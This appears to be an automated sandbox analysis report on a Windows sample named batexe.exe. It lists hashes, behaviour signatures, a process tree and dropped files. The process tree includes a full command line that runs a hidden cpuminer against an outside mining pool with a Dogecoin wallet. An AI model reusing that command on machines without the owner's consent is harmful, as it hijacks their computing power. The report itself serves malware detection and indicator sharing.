Analysis

  • max time kernel
    294s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20240214-ja
  • resource tags

    arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    18-02-2024 10:47

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Users\Admin\AppData\Local\Temp\C776.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\C776.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\C776.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3612
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CC1A.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1588
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4392

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\C776.tmp\b2e.exe

    Filesize

    3.1MB

    MD5

    6b37edd72761eb10ecf6d3aba38fa73c

    SHA1

    25d8a4ddc239c7dcc5a36a586d649665367dbeb0

    SHA256

    8fd5d195f2f188fa8e665ffea7eccb21740ed4b325bee46997558b920ee2f1e5

    SHA512

    3d3a2a4fc95444daba48f0452ad874c248e48072be7ac9a749aebec3f83065bfc25ab87926cb3f230466de2769eec9f70576ee59c5edeede6f999450cfb8cda2

  • C:\Users\Admin\AppData\Local\Temp\C776.tmp\b2e.exe

    Filesize

    2.2MB

    MD5

    b6a558633dc13e01c86f714214bdd894

    SHA1

    95921cb72467d2a69885d7987fa6990ed3756e81

    SHA256

    85cd30b679653b5cc0ca0c6cb9e56e841122391168a2237121da79b28b9fd507

    SHA512

    d55e570830a21e8ffe9d7a769576afce67fa05396d4450818bfa45132e1f10e5bf8f10026e9fa621f0451f8908d7c9bff9590f64a85d5048af173f5e529aa7c2

  • C:\Users\Admin\AppData\Local\Temp\CC1A.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    704KB

    MD5

    ce5f200d2d48a057722a957d5acc6426

    SHA1

    e7a8d4c0dc7b561dfa26e3fddaff015716187305

    SHA256

    cb450c8c0a952560f35f4b93f14357fc3856ee0b016eabf8bb4d20e9504d82df

    SHA512

    e7d3b203cc96d08b6d000f6845bbeb5777cd08babadbcb86266193ca68d8183973b3a92f5cf587df1f26bf04a182fa51001b7317c9a9e7ba868d1e26b897ee9b

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    512KB

    MD5

    a5993c0dd7587f1716037dcfe1f63091

    SHA1

    9a4d23ce36f5fc5791692b47d977c0bf92842879

    SHA256

    568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3

    SHA512

    c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    512KB

    MD5

    6162b21c54b88c5c990e82aee951ebb4

    SHA1

    477384ab8ebe5f5a5d5a91603736d9ef53c12fd4

    SHA256

    462eb68967c7205145d0b92e4f3b69297f616187b07a189178f35f288063aff4

    SHA512

    6264ee49c4b8a6eaa69241e10ff9ab39445f85a57b756b8bc0530b45d77827d05e669dc06b689d4693db34e4161ef11b2cfe6f1954b0b90bcd434e81a938a40d

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    448KB

    MD5

    ca123cec7f705c0af114e462349dc686

    SHA1

    75f90b4d95f6774b2f66e4ba790755ef118ab222

    SHA256

    7f141cdc0be9c965e21310bcfb0484b20d31ffd8a6a970f8b5a53c0e8974798a

    SHA512

    650125faa9ae6733f1118caf3101ca6850473f78f9bfc3a87e908eac1c69935e3bc269ffb5de4dd6e867429c1af35c7f3b9e62eb698fa7c9695d68e7115f3f1c

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    384KB

    MD5

    eec15153c344f43f1919cb379b9ee2f9

    SHA1

    3e4a09390ac885ea2797209603bcfa1ec6ff0cc6

    SHA256

    4e4d7ecae87e8e656c61af89ef17146baf33fbf09ffbde6ae971d04e8e8f9222

    SHA512

    7cdf3552341d14979838f8fedf9ac63482152f193ab8f7e0af281ec50b2a43312d78c0e22e79989818c5041538fa69769350e1e6cf0789a165be1eb11ee29908

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    384KB

    MD5

    d1d1f36cdbccda3b96e8c164afb74526

    SHA1

    91bafcd404c8568c9a195ec8cbf9592ea9e17e8b

    SHA256

    ea6e726150aa9a8dcf9ccb6a991440b451f9f2dcc46d93cb35971556879d1d03

    SHA512

    2306e6578ba2217b4f32913e1ac35e0547723b873c11244e96affd05457945373c621ea16a82e1e3aa1a177e3059efc40c8585118c63a3ea145524c51d1d18c9

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    448KB

    MD5

    8185100383d0fe360c9198e5a883b08d

    SHA1

    ab398c469573f8e84d3cfcef01287a0604d6ab5f

    SHA256

    05ef7288b0d559bf67c3d69c201da9bdcaed0b49ecc538640f7b96c5b82eb538

    SHA512

    24930ef0caa1f2db2ed60f7dfdb832a172cf7747b0a336b051f73c0087a5f2fabff721487cb49cf5a3bc2be5426554b0a3a0e51541b6a4ca735646af24f1404a

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    128KB

    MD5

    9746d1ac79c8b499d8b2224394581fa7

    SHA1

    36b1985eabfd8131ad9f2b7f69c903a3fce67629

    SHA256

    77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

    SHA512

    61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    192KB

    MD5

    625f906456510afaf916dd0384d76eee

    SHA1

    66c56574aff02fb199caa60ab71ca9f1c9e7fc92

    SHA256

    27baaef233592b03722c7d64c26d2270c0300ffb8e7f08a8e0d65212af4b848d

    SHA512

    041399c5ddc614d8b1a359238df8fb09258c95a0013e5139dbf4093b892395f5f78fa31fbecfee92966c5e78a5c5894005c98e559b8b5735ecf9c1995df51b17

  • memory/1284-5-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB

  • memory/3612-6-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3612-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/4392-42-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/4392-41-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/4392-43-0x000000005BFD0000-0x000000005C068000-memory.dmp

    Filesize

    608KB

  • memory/4392-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

    Filesize

    24.7MB

  • memory/4392-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4392-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4392-56-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4392-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4392-71-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4392-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4392-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4392-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB